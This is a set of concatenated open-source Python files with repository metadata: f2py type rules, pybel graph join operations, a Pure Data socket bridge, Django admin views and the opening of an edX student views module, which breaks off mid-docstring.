require_numpy = True,
),
numpy_iter = dict(\
pyctype = 'PyArrayIter_Type',
ctype = 'PyArrayIterObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
numpy_multiiter = dict(\
pyctype = 'PyArrayMultiIter_Type',
ctype = 'PyArrayMultiIterObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
npy_bool = dict(\
ctype = 'npy_bool',
init = ' = 0',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_bool',
return_format = 'O&',
return_converter = 'pyobj_from_npy_bool',
argument_title = 'a python truth value (converting to C npy_bool)',
return_title = 'a numpy bool',
require_numpy = True,
),
numpy_bool = dict(\
ctype = 'PyBoolScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_bool',
return_format = 'N',
require_numpy = True,
argument_title = 'a python bool (converting to C PyBoolScalarObject*)',
return_title = 'a numpy bool',
),
numpy_string = dict(\
ctype = 'PyStringScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_string',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyStringScalarObject*)',
return_title = 'a numpy string',
),
numpy_unicode = dict(\
ctype = 'PyUnicodeScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_unicode',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyUnicodeScalarObject*)',
return_title = 'a numpy unicode',
),
npy_string = dict(\
typedef = 'npy_string',
ctype = 'npy_string',
init = ' = {NULL, 0}',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_string',
clean_argument_converter = 'clean_pyobj_to_npy_string',
return_format = 'O&',
return_converter = 'pyobj_from_npy_string',
require_numpy = True,
argument_title = 'a python string (converting to C npy_string)',
return_title = 'a numpy string',
),
npy_unicode = dict(\
typedef = 'npy_unicode',
ctype = 'npy_unicode',
init = ' = {NULL, 0}',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_unicode',
clean_argument_converter = 'clean_pyobj_to_npy_unicode',
return_format = 'O&',
return_converter = 'pyobj_from_npy_unicode',
require_numpy = True,
argument_title = 'a python string (converting to C npy_unicode)',
return_title = 'a numpy unicode',
),
numpy_void = dict(\
ctype = 'PyVoidScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_void',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyVoidScalarObject*)',
return_title = 'a numpy void',
),
)
# --- Aliases: make alternative type-name spellings resolve to the same spec ---
scalar['c_PY_LONG_LONG'] = scalar['c_long_long']
scalar['c_unsigned_PY_LONG_LONG'] = scalar['c_unsigned_long_long']
scalar['numpy_bool_'] = scalar['numpy_bool']
scalar['numpy_str_'] = scalar['numpy_str'] = scalar['numpy_string0'] = \
    scalar['numpy_string_'] = scalar['numpy_string']
scalar['numpy_unicode0'] = scalar['numpy_unicode_'] = scalar['numpy_unicode']
scalar['npy_str'] = scalar['npy_string']
scalar['numpy_void0'] = scalar['numpy_void']

# --- Generate specs for every sized scalar kind declared in sctypebits ---
# For each class name (e.g. 'Int', 'Float', 'Complex') and bit width, two
# entries are produced: a C-level 'npy_<kind><bits>' spec using O& converters,
# and a Python-scalar-object 'numpy_<kind><bits>' spec.
for Cls_name, bits_list in sctypebits.items():
    if Cls_name=='Complex':
        init = ' = {0.0, 0.0}'
        t = 'complex'
    elif Cls_name=='Float':
        init = ' = 0.0'
        t = 'floating point number'
    else:
        init = ' = 0'
        t = 'integer'
    for bits in bits_list:
        n = Cls_name.lower() + str(bits)
        Cls = Cls_name + str(bits)
        ctype = 'npy_' + n
        scalar[ctype] = dict(
            ctype = ctype,
            pyctype = None,  # bug fix: key was misspelled 'pycype' (cf. block below)
            init = init,
            argument_format = 'O&',
            argument_converter = 'pyobj_to_'+ctype,
            return_format = 'O&',
            return_converter = 'pyobj_from_'+ctype,
            require_numpy = True,
            argument_title = 'a python %s (converting to C %s)' % (t,ctype),
            return_title = 'a numpy %s-bit %s' % (bits, t)
            )
        ctype = 'Py%sScalarObject*' % (Cls)
        ctype_name = 'numpy_' + n
        scalar[ctype_name] = dict(
            ctype = ctype,
            pyctype = None,
            init = ' = NULL',
            argument_format = 'O&',
            argument_converter = 'pyobj_to_'+ctype_name,
            return_format = 'N',
            require_numpy = True,
            argument_title = 'a python %s (converting to C %s)' % (t,ctype),
            return_title = 'a numpy %s-bit %s' % (bits, t)
            )

# Platform-dependent aliases resolved via numpy's native scalar type names.
# NOTE(review): numpy.float_ / numpy.complex_ were removed in numpy 2.0; these
# lines assume a pre-2.0 numpy -- confirm before upgrading.
scalar['npy_intp'] = scalar['npy_'+numpy.intp.__name__]
scalar['npy_int'] = scalar['npy_'+numpy.int_.__name__]
scalar['npy_float'] = scalar['npy_'+numpy.float_.__name__]
scalar['npy_complex'] = scalar['npy_'+numpy.complex_.__name__]
array = dict(
numpy_int64 = dict(\
typenum = 'PyArray_INT64',
ctype = 'PyArrayObject*',
init = ' = NULL',
title = 'a numpy array of 64-bit integers',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_array_int64',
return_format = 'N',
require_numpy = True,
),
c_int = dict(\
ctype='int*',
init=' = NULL',
title='a C int array',
input_title = 'a python integer sequence (converting to C int*)',
input_format = 'O',
input_object = '&%(varname)s_py',
input_frompyobj = dict(\
required = '%(varname)s_arr = PyArray_FROMANY(%(varname)s_py, NPY_INT, %(rank)s, %(rank)s, %(requirements)s);\n'
'if (%(varname)s_arr != NULL) {\n'
' %(varname)s = PyArray_DATA(%(varname)s_arr);',
),
input_cleanfrompyobj = dict(\
required = '} /*if (%(varname)s_arr != NULL)*/'
),
output_title = 'a python integer sequence (converting from C int*)',
output_format = 'N',
output_object = '%(varname)s_arr'
),
numpy_int8 = dict(\
ctype='npy_int8*',
init=' = NULL',
title='a C npy_int8 array'
)
)
| travellhyne/f2py | extgen/type_rules.py | Python | bsd-3-clause | 17,012 |
# -*- coding: utf-8 -*-
"""Operations for BEL graphs."""
from typing import Iterable
import networkx as nx
from tqdm.autonotebook import tqdm
from .utils import update_metadata
from ..dsl import BaseEntity
__all__ = [
"subgraph",
"left_full_join",
"left_outer_join",
"union",
"left_node_intersection_join",
"node_intersection",
]
def subgraph(graph, nodes: Iterable[BaseEntity]):
    """Build a new child graph induced over the given nodes.

    :rtype: BELGraph
    """
    induced = graph.subgraph(nodes)
    result = graph.child()
    # mirror what .copy() does: carry over graph-level metadata
    result.graph.update(induced.graph)
    for node, attrs in induced.nodes(data=True):
        result.add_node(node, **attrs)
    result.add_edges_from(
        (source, target, key, attrs.copy())
        for source, target, key, attrs in induced.edges(keys=True, data=True)
    )
    return result
def left_full_join(g, h) -> None:
    """Merge every node and edge of ``h`` into ``g``, modifying ``g`` in place.

    :param pybel.BELGraph g: A BEL graph (receives the data)
    :param pybel.BELGraph h: A BEL graph (is merged in)

    Example usage:

    >>> import pybel
    >>> g = pybel.from_bel_script('...')
    >>> h = pybel.from_bel_script('...')
    >>> left_full_join(g, h)
    """
    missing_nodes = ((node, data) for node, data in h.nodes(data=True) if node not in g)
    g.add_nodes_from(missing_nodes)
    missing_edges = (
        (u, v, key, data)
        for u, v, key, data in h.edges(keys=True, data=True)
        if u not in g or v not in g[u] or key not in g[u][v]
    )
    g.add_edges_from(missing_edges)
    update_metadata(h, g)
    g.warnings.extend(h.warnings)
def left_outer_join(g, h) -> None:
    """Add only those components of ``h`` that touch ``g``, in-place for ``g``.

    Algorithm:

    1. Identify all weakly connected components in ``h``
    2. Merge in those that share at least one node with ``g``

    :param BELGraph g: A BEL graph
    :param BELGraph h: A BEL graph

    Example usage:

    >>> import pybel
    >>> g = pybel.from_bel_script('...')
    >>> h = pybel.from_bel_script('...')
    >>> left_outer_join(g, h)
    """
    anchor_nodes = set(g)
    for component in nx.weakly_connected_components(h):
        if not anchor_nodes.isdisjoint(component):
            left_full_join(g, subgraph(h, component))
def _left_outer_join_graphs(target, graphs):
    """Outer-join each graph in ``graphs`` into ``target``, in order.

    Note: the order of graphs will have significant results!

    :param BELGraph target: A BEL graph
    :param iter[BELGraph] graphs: An iterator of BEL graphs
    :rtype: BELGraph
    """
    for candidate in graphs:
        left_outer_join(target, candidate)
    return target
def union(graphs, use_tqdm: bool = False):
    """Take the union over a collection of graphs into a new graph.

    Assumes iterator is longer than 2, but not infinite.

    :param iter[BELGraph] graphs: An iterator over BEL graphs. Can't be infinite.
    :param use_tqdm: Should a progress bar be displayed?
    :return: A merged graph
    :rtype: BELGraph

    Example usage:

    >>> import pybel
    >>> g = pybel.from_bel_script('...')
    >>> h = pybel.from_bel_script('...')
    >>> k = pybel.from_bel_script('...')
    >>> merged = union([g, h, k])
    """
    it = iter(graphs)
    if use_tqdm:
        it = tqdm(it, desc="taking union")
    try:
        # the first graph becomes the merge target
        target = next(it)
    except StopIteration as e:
        raise ValueError("no graphs given") from e
    try:
        graph = next(it)
    except StopIteration:
        # NOTE(review): with exactly one graph, the ORIGINAL graph is returned
        # (no copy), unlike the multi-graph path below -- confirm intended.
        return target
    else:
        # copy so the caller's first graph is not mutated by the joins below
        target = target.copy()
    left_full_join(target, graph)
    for graph in it:
        left_full_join(target, graph)
    return target
def left_node_intersection_join(g, h):
    """Take the intersection of two graphs.

    Defined as the union of the sub-graphs induced over the nodes the two
    graphs have in common.

    :param BELGraph g: A BEL graph
    :param BELGraph h: A BEL graph
    :rtype: BELGraph

    Example usage:

    >>> import pybel
    >>> g = pybel.from_bel_script('...')
    >>> h = pybel.from_bel_script('...')
    >>> merged = left_node_intersection_join(g, h)
    """
    shared_nodes = set(g) & set(h)
    g_part = subgraph(g, shared_nodes)
    h_part = subgraph(h, shared_nodes)
    left_full_join(g_part, h_part)
    return g_part
def node_intersection(graphs):
    """Take the node intersection over a collection of graphs into a new graph.

    This intersection is defined the same way as by :func:`left_node_intersection_join`.

    :param iter[BELGraph] graphs: An iterable of graphs. Since it's iterated over twice, it gets converted to a
     tuple first, so this isn't a safe operation for infinite lists.
    :rtype: BELGraph

    Example usage:

    >>> import pybel
    >>> g = pybel.from_bel_script('...')
    >>> h = pybel.from_bel_script('...')
    >>> k = pybel.from_bel_script('...')
    >>> merged = node_intersection([g, h, k])
    """
    graphs = tuple(graphs)
    if not graphs:
        raise ValueError("no graphs given")
    if len(graphs) == 1:
        return graphs[0]
    common_nodes = set(graphs[0])
    for other in graphs[1:]:
        common_nodes.intersection_update(other)
    return union(subgraph(g, common_nodes) for g in graphs)
| pybel/pybel | src/pybel/struct/operations.py | Python | mit | 5,181 |
'''
Split incoming events in various ways.
'''
import libs.modifiers
class Copy(libs.modifiers.Modifier):
    """Modifier that exposes one input channel and one copy output channel."""

    def __init__(self):
        # single input channel, single (initially empty) output channel
        self.inputs = {'main': None}
        self.outputs = {'copy': []}
| aj00200/midifire | src/libs/modifiers/splitters.py | Python | gpl-3.0 | 249 |
from geotrek.common.mixins import NoDeleteMixin
from mapentity.management.commands.prepare_map_images import Command as MapentityCommand
class Command(MapentityCommand):
    """Override mapentity command of the same name to exclude deleted objects."""

    def get_instances(self, model):
        """Return the queryset to process, hiding soft-deleted rows when supported."""
        manager = model.objects
        return manager.existing() if issubclass(model, NoDeleteMixin) else manager.all()
| mabhub/Geotrek | geotrek/common/management/commands/prepare_map_images.py | Python | bsd-2-clause | 433 |
##########################################################
##########################################################
# description: class that handles pd communication
#
# important: based on Frank Barknecht script at:
# http://markmail.org/message/ohuwrz77hwo3bcwp#query:python%20pdsend+page:1+mid:ybdc6esbu7q53otu+state:results
#
# autor: jeraman
# date: 06/04/2009
##########################################################
##########################################################
#import sys
from threading import *
from socket import *
from time import *
from subprocess import *
from basic_classes.box import *
from basic_classes.number import *
from basic_classes.symbol import *
from basic_classes.connection import *
# a thread class that we're gonna use for calling the server.pd patch
class RemotePd ( Thread ):
    # Thread that launches the pd process running server.pd via a shell command.
    def __init__(self, nogui, pd_dir, server_dir):
        Thread.__init__(self)
        self.nogui = nogui
        self.server_dir = server_dir
        self.pd_dir = pd_dir
    #run method: builds the shell command and spawns pd.
    # When nogui is True, cd into pd_dir first (presumably a local pd build --
    # confirm); otherwise rely on 'pd' being on the PATH.
    def run ( self ):
        if self.nogui:
            temp = "cd %s && pd -nogui %s/server.pd" %(self.pd_dir, self.server_dir)
        else:
            temp = "pd -nogui %s/server.pd" %(self.server_dir)
        self.p = Popen(temp, shell=True)
#communication class
class Communication():
#constructor
def __init__(self, nogui):
# variables from config file
self.pd_dir = ""
self.server_dir = "libs/pyata/src/aux_patches"
self.host = "localhost"
self.snd_port = ""
self.rcv_port = ""
self.load_config() #loads the properties.config
#class variables
self.snd_socket = socket(AF_INET, SOCK_STREAM)
self.rcv_socket = socket(AF_INET, SOCK_STREAM)
self.thread=RemotePd(nogui, self.pd_dir, self.server_dir)
self.file = open(self.server_dir+"/server.pd","r")
self.rcv = ""
#loads the properties.config
def load_config(self):
config = open("libs/pyata/properties.config","r")
#reads the pd dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.pd_dir = temp[:len(temp)-1]
#reads the server dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.rcv_port = int(temp)
#reads the server dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.snd_port = int(temp)
config.close()
#connecting to pd
def init_pd(self):
print "initializing server.pd..."
self.thread.start()
sleep(5)
try:
self.snd_socket.connect((self.host, self.snd_port))
self.rcv_socket.bind((self.host, self.rcv_port))
self.rcv_socket.listen(1)
self.rcv, addr = self.rcv_socket.accept()
self.init_pyata()
print "connecting with pd"
return True
except error, err:
print "Error connecting to %s:%d: %s" % (self.host, self.snd_port, err)
return False
#init some socket variables
def init_pyata(self):
Box.set_sender(self)
Connection.set_sender(self)
Number.init_socket(self.rcv)
Symbol.init_socket(self.rcv)
#sending a command to pd
def send_pd(self, commands):
try:
self.snd_socket.send(commands)
return True
except error, err:
print "Error sending message %s : %s" % (message, err)
return False
#closing connection
def finish_pd(self):
try:
temp = "killall pd"
p = Popen(temp, shell=True)
self.snd_socket.close()
self.rcv_socket.close()
self.file.close()
print "closing connection with pd"
return True
except error, err:
print "Error sending message %s : %s" % (message, err)
return False
def save_state(self, canvas):
self.snd_socket.send(canvas + "menusave ; ")
sleep(0.1)
#returns the useful content of a file
def get_file(self):
self.file.seek(0)
text = self.file.read()
i = text.find("new")
text = text[(i+7):(len(text))]
i = text.find("pd new;")
text = text[0:(i-18)]
return text
#setting the canvas to where the messages are going
def set_canvas(self, canvas):
self.canvas=canvas
#aux static function to debug this class
@staticmethod
def debug():
c = Communication(False)
c.init_pd()
sleep(5)
c.finish_pd()
| husk00/pantaliQa | libs/pyata/src/communication.py | Python | gpl-2.0 | 4,921 |
import json
from pprint import pprint
import datetime
from datetime import date
import re
import itertools
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.core.urlresolvers import reverse_lazy, reverse, resolve
from django.core.exceptions import ObjectDoesNotExist
from django.core import serializers
from django.views import generic
from django.views.decorators.cache import cache_control as django_cache_control
from django.contrib.auth.models import User,Group
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from pandas import read_csv
from pandas import DataFrame
from functools import partial
from datapoints.models import *
from datapoints.forms import *
from datapoints import cache_tasks
from datapoints.mixins import PermissionRequiredMixin
class IndexView(generic.ListView):
    """Base paginated list view; subclasses supply ``model``."""
    paginate_by = 20
    def get_queryset(self):
        # newest records first
        return self.model.objects.order_by('-created_at')
###################
###################
### DATA POINTS ###
###################
###################
class DataPointIndexView(IndexView):
    """Paginated list of the most recent DataPoints."""
    model=DataPoint
    template_name = 'datapoints/index.html'
    context_object_name = 'top_datapoints'
def data_entry(request):
    """Render the data-entry page shell."""
    return render_to_response('data-entry/index.html',
        context_instance=RequestContext(request))
def dashboard_list(request):
    """Render the dashboard-builder list page."""
    return render_to_response('dashboard-builder/list.html',
        context_instance=RequestContext(request))
def dashboard_builder(request,dashboard_id=None):
    """Render the dashboard builder; ``dashboard_id`` is None when creating a new one."""
    return render_to_response('dashboard-builder/index.html', {'dashboard_id': dashboard_id },
        context_instance=RequestContext(request))
def chart_builder(request,dashboard_id):
    """Render the chart builder for an existing dashboard."""
    return render_to_response('dashboard-builder/chart_builder.html', {'dashboard_id': dashboard_id },
        context_instance=RequestContext(request))
class DashBoardView(IndexView):
    """Render the user dashboard page."""
    paginate_by = 50
    template_name = 'dashboard/index.html'
    context_object_name = 'user_dashboard'
    def get_queryset(self):
        # only one row is fetched -- presumably the template just needs the
        # page shell rather than the data; confirm before changing
        return DataPoint.objects.all()[:1]
#################
### CAMPAIGNS ###
#################
class CampaignCreateView(PermissionRequiredMixin,generic.CreateView):
    """Admin form for creating a Campaign; redirects to the campaign list on success."""
    model = Campaign
    success_url = '/ufadmin/campaigns'
    template_name = 'campaigns/create.html'
    permission_required = 'datapoints.add_campaign'
    fields = ['office','campaign_type','start_date','end_date']
class CampaignUpdateView(PermissionRequiredMixin,generic.UpdateView):
    """Admin form for editing a Campaign (reuses the create template)."""
    model=Campaign
    success_url = '/ufadmin/campaigns'
    template_name = 'campaigns/create.html'
    form_class = CampaignForm
    # NOTE(review): permission check is disabled -- confirm this is intentional
    # permission_required = 'datapoints.change_campaign'
###############
### REGIONS ###
###############
class RegionCreateView(PermissionRequiredMixin,generic.CreateView):
    """Admin form for creating a Region, stamping the creating user on the row."""
    model=Region
    template_name='regions/create.html'
    permission_required = 'datapoints.add_region'
    form_class = RegionForm
    success_url= '/ufadmin/regions'
    def form_valid(self, form):
        # this inserts into the changed_by field with the user who made the insert
        obj = form.save(commit=False)
        obj.changed_by = self.request.user
        obj.save()
        return HttpResponseRedirect(self.success_url)
class RegionUpdateView(PermissionRequiredMixin,generic.UpdateView):
    """Admin form for editing a Region."""
    model = Region
    success_url = '/ufadmin/regions'
    template_name = 'regions/update.html'
    permission_required = 'datapoints.change_region'
##############################
##############################
#### FUNCTION BASED VIEWS ####
##############################
##############################
def manage_data_refresh(request):
    """List past cache jobs (excluding no-op runs), newest first."""
    cache_jobs = CacheJob.objects.all().\
        exclude(response_msg='NOTHING_TO_PROCESS').order_by('-id')
    return render_to_response('manage_data_refresh.html',{'cache_jobs':cache_jobs},
        context_instance=RequestContext(request))
def refresh_cache(request):
    """Run a datapoint cache refresh, then return to the refresh-management page."""
    cache_tasks.CacheRefresh()  # instantiating runs the refresh; the instance was never used
    return HttpResponseRedirect(reverse('datapoints:manage_data_refresh'))
def parse_url_args(request, keys):
    """Extract the given query-string parameters from ``request.GET``.

    :param request: an HttpRequest (only ``.GET`` is read)
    :param keys: iterable of parameter names to extract
    :return: dict mapping each key to its value, or ``None`` when absent
    """
    # QueryDict.get(k) already returns None for missing keys, so the original
    # try/except KeyError dance is unnecessary.
    return {k: request.GET.get(k) for k in keys}
def refresh_metadata(request):
    '''
    This is what happens when you click the "refresh_metadata" button
    '''
    # The return values were never used, so don't bind them to locals.
    cache_tasks.cache_indicator_abstracted()
    cache_tasks.cache_user_abstracted()
    cache_tasks.cache_campaign_abstracted()
    cache_tasks.cache_region_tree()
    cache_tasks.update_source_object_names()
    return HttpResponseRedirect(reverse('datapoints:manage_data_refresh'))
class GroupCreateView(PermissionRequiredMixin, generic.CreateView):
    """Admin form for creating an auth Group."""
    model = Group
    template_name = 'group_create.html'
class GroupEditView(PermissionRequiredMixin,generic.UpdateView):
    """Admin form for editing an auth Group; redirects back to itself on success."""
    model = Group
    template_name = 'group_update.html'
    def get_success_url(self):
        requested_group_id = self.get_object().id
        return reverse_lazy('datapoints:group_update',kwargs={'pk':
            requested_group_id})
    def get_context_data(self, **kwargs):
        # expose the group's id to the template
        context = super(GroupEditView, self).get_context_data(**kwargs)
        group_obj = self.get_object()
        context['group_id'] = group_obj.id
        return context
class UserCreateView(PermissionRequiredMixin,generic.CreateView):
    """Admin form for creating a User; jumps to that user's edit page on success."""
    model = User
    template_name = 'user_create.html'
    form_class = UserCreateForm
    def form_valid(self, form):
        new_user = form.save()
        return HttpResponseRedirect(reverse('datapoints:user_update', \
            kwargs={'pk':new_user.id}))
class UserEditView(PermissionRequiredMixin,generic.UpdateView):
    """Admin form for editing a User; redirects back to itself on success."""
    model = User
    template_name = 'user_edit.html'
    form_class = UserEditForm
    def get_success_url(self):
        requested_user_id = self.get_object().id
        return reverse_lazy('datapoints:user_update',kwargs={'pk':
            requested_user_id})
    def get_context_data(self, **kwargs):
        # expose the user's id to the template
        context = super(UserEditView, self).get_context_data(**kwargs)
        user_obj = self.get_object()
        context['user_id'] = user_obj.id
        return context
class IndicatorCreateView(PermissionRequiredMixin,generic.CreateView):
    """Admin form for creating an Indicator; jumps to its edit page on success."""
    # NOTE(review): model = User and the 'user_create.html' template look
    # copy-pasted from UserCreateView -- presumably this should be Indicator
    # with its own template; confirm before changing.
    model = User
    template_name = 'user_create.html'
    form_class = IndicatorForm
    def form_valid(self, form):
        new_indicator = form.save()
        return HttpResponseRedirect(reverse('datapoints:update_indicator', \
            kwargs={'pk':new_indicator.id}))
class IndicatorEditView(PermissionRequiredMixin,generic.UpdateView):
    """Admin form for editing an Indicator; redirects back to itself on success."""
    model = Indicator
    template_name = 'indicators/upsert.html'
    form_class = IndicatorForm
    def get_success_url(self):
        new_indicator_id = self.get_object().id
        return reverse_lazy('datapoints:update_indicator',kwargs={'pk':
            new_indicator_id})
    def get_context_data(self, **kwargs):
        # expose the indicator's pk to the template
        context = super(IndicatorEditView, self).get_context_data(**kwargs)
        indicator_obj = self.get_object()
        context['pk'] = indicator_obj.id
        return context
def html_decorator(func):
    """
    This decorator wraps the output of the django debug tooldbar in html.
    (From http://stackoverflow.com/a/14647943)
    """
    from functools import wraps  # local import: the file only imports functools.partial

    @wraps(func)  # preserve the wrapped view's name/docstring for debugging & introspection
    def _decorated(*args, **kwargs):
        response = func(*args, **kwargs)
        # HttpResponse accepts an iterable of content chunks and joins them
        wrapped = ("<html><body>",
                   response.content,
                   "</body></html>")
        return HttpResponse(wrapped)
    return _decorated
@html_decorator
def debug(request):
    """
    Debug endpoint that uses the html_decorator,
    """
    path = request.META.get("PATH_INFO")
    # strip the "debug/" prefix to find the real API endpoint being proxied
    api_url = path.replace("debug/", "")
    view = resolve(api_url)
    # force the downstream view to negotiate a JSON response
    accept = request.META.get("HTTP_ACCEPT")
    accept += ",application/json"
    request.META["HTTP_ACCEPT"] = accept
    res = view.func(request, **view.kwargs)
    # NOTE(review): reaches into the private _container attribute of the response
    return HttpResponse(res._container)
| unicef/polio | datapoints/views.py | Python | agpl-3.0 | 8,266 |
"""
Student Views
"""
import datetime
import logging
import uuid
import json
import warnings
from collections import defaultdict
from urlparse import urljoin, urlsplit, parse_qs, urlunsplit
from django.views.generic import TemplateView
from pytz import UTC
from requests import HTTPError
from ipware.ip import get_ip
import edx_oauth2_provider
from django.conf import settings
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import password_reset_confirm
from django.contrib import messages
from django.core.context_processors import csrf
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch, reverse_lazy
from django.core.validators import validate_email, ValidationError
from django.db import IntegrityError, transaction
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, Http404
from django.shortcuts import redirect
from django.utils.encoding import force_bytes, force_text
from django.utils.translation import ungettext
from django.utils.http import base36_to_int, urlsafe_base64_encode, urlencode
from django.utils.translation import ugettext as _, get_language
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from django.views.decorators.http import require_POST, require_GET
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from django.template.response import TemplateResponse
from provider.oauth2.models import Client
from ratelimitbackend.exceptions import RateLimitException
from social.apps.django_app import utils as social_utils
from social.backends import oauth as social_oauth
from social.exceptions import AuthException, AuthAlreadyAssociated
from edxmako.shortcuts import render_to_response, render_to_string
from course_modes.models import CourseMode
from shoppingcart.api import order_history
from student.models import (
Registration, UserProfile,
PendingEmailChange, CourseEnrollment, CourseEnrollmentAttribute, unique_id_for_user,
CourseEnrollmentAllowed, UserStanding, LoginFailures,
create_comments_service_user, PasswordHistory, UserSignupSource,
DashboardConfiguration, LinkedInAddToProfileConfiguration, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED,
LogoutViewConfiguration)
from student.forms import AccountCreationForm, PasswordResetFormNoActive, get_registration_extension_form
from student.tasks import send_activation_email
from lms.djangoapps.commerce.utils import EcommerceService # pylint: disable=import-error
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=import-error
from bulk_email.models import Optout, BulkEmailFlag # pylint: disable=import-error
from certificates.models import CertificateStatuses, certificate_status_for_student
from certificates.api import ( # pylint: disable=import-error
get_certificate_url,
has_html_certificates_enabled,
)
from xmodule.modulestore.django import modulestore
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import CourseLocator
from collections import namedtuple
from courseware.courses import get_courses, sort_by_announcement, sort_by_start_date # pylint: disable=import-error
from courseware.access import has_access
from django_comment_common.models import Role
from external_auth.models import ExternalAuthMap
import external_auth.views
from external_auth.login_and_register import (
login as external_auth_login,
register as external_auth_register
)
from lang_pref import LANGUAGE_KEY
import track.views
import dogstats_wrapper as dog_stats_api
from util.db import outer_atomic
from util.json_request import JsonResponse
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.milestones_helpers import (
get_pre_requisite_courses_not_completed,
)
from util.password_policy_validators import validate_password_strength
import third_party_auth
from third_party_auth import pipeline, provider
from student.helpers import (
check_verify_status_by_course,
auth_pipeline_urls, get_next_url_for_login_page,
DISABLE_UNENROLL_CERT_STATES,
)
from student.cookies import set_logged_in_cookies, delete_logged_in_cookies
from student.models import anonymous_id_for_user, UserAttribute, EnrollStatusChange
from shoppingcart.models import DonationConfiguration, CourseRegistrationCode
from embargo import api as embargo_api
import analytics
from eventtracking import tracker
# Note that this lives in LMS, so this dependency should be refactored.
from notification_prefs.views import enable_notifications
from openedx.core.djangoapps.credit.email_utils import get_credit_provider_display_names, make_providers_strings
from openedx.core.djangoapps.user_api.preferences import api as preferences_api
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangoapps.programs import utils as programs_utils
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.theming import helpers as theming_helpers
# Module-level loggers: general student events and the security audit trail.
log = logging.getLogger("edx.student")
AUDIT_LOG = logging.getLogger("audit")
# Per-course reverification record rendered on the dashboard.
ReverifyInfo = namedtuple('ReverifyInfo', 'course_id course_name course_number date status display')  # pylint: disable=invalid-name
# Event name emitted when a user starts changing an account setting.
SETTING_CHANGE_INITIATED = 'edx.user.settings.change_initiated'
# Used as the name of the user attribute for tracking affiliate registrations
REGISTRATION_AFFILIATE_ID = 'registration_affiliate_id'
# used to announce a registration
REGISTER_USER = Signal(providing_args=["user", "profile"])
# Disable this warning because it doesn't make sense to completely refactor tests to appease Pylint
# pylint: disable=logging-format-interpolation
def csrf_token(context):
    """Return a hidden-input snippet carrying the CSRF token, or '' if unavailable."""
    raw = context.get('csrf_token', '')
    return '' if raw == 'NOTPROVIDED' else (
        u'<div style="display:none"><input type="hidden"'
        u' name="csrfmiddlewaretoken" value="%s" /></div>' % (raw)
    )
# NOTE: This view is not linked to directly--it is called from
# branding/views.py:index(), which is cached for anonymous users.
# This means that it should always return the same thing for anon
# users. (in particular, no switching based on query params allowed)
def index(request, extra_context=None, user=AnonymousUser()):
    """
    Render the edX main page.

    extra_context is used to allow immediate display of certain modal windows, eg signup,
    as used by external_auth.
    """
    # NOTE(review): the AnonymousUser() default is evaluated once at import
    # time and shared across calls; harmless only if never mutated -- confirm.
    if extra_context is None:
        extra_context = {}

    courses = get_courses(user)

    if configuration_helpers.get_value(
        "ENABLE_COURSE_SORTING_BY_START_DATE",
        settings.FEATURES["ENABLE_COURSE_SORTING_BY_START_DATE"],
    ):
        courses = sort_by_start_date(courses)
    else:
        courses = sort_by_announcement(courses)

    context = {'courses': courses}

    context['homepage_overlay_html'] = configuration_helpers.get_value('homepage_overlay_html')

    # This appears to be an unused context parameter, at least for the master templates...
    context['show_partners'] = configuration_helpers.get_value('show_partners', True)

    # TO DISPLAY A YOUTUBE WELCOME VIDEO
    # 1) Change False to True
    context['show_homepage_promo_video'] = configuration_helpers.get_value('show_homepage_promo_video', False)

    # 2) Add your video's YouTube ID (11 chars, eg "123456789xX"), or specify via site configuration
    # Note: This value should be moved into a configuration setting and plumbed-through to the
    # context via the site configuration workflow, versus living here
    youtube_video_id = configuration_helpers.get_value('homepage_promo_video_youtube_id', "your-youtube-id")
    context['homepage_promo_video_youtube_id'] = youtube_video_id

    # allow for theme override of the courses list
    context['courses_list'] = theming_helpers.get_template_path('courses_list.html')

    # Insert additional context for use in the template
    context.update(extra_context)

    return render_to_response('index.html', context)
def process_survey_link(survey_link, user):
    """
    Personalize a survey link for the given user.

    Any ``{UNIQUE_ID}`` placeholder in the link is replaced with an
    anonymized identifier for the user (currently sha1(user.username),
    via ``unique_id_for_user``). Links without the placeholder pass
    through unchanged.
    """
    anonymized_id = unique_id_for_user(user)
    return survey_link.format(UNIQUE_ID=anonymized_id)
def cert_info(user, course_overview, course_mode):
    """
    Get the certificate info needed to render the dashboard section for the given
    student and course.

    Arguments:
        user (User): A user.
        course_overview (CourseOverview): A course.
        course_mode (str): The enrollment mode (honor, verified, audit, etc.)

    Returns:
        dict: Empty dict if certificates are disabled or hidden, or a dictionary with keys:
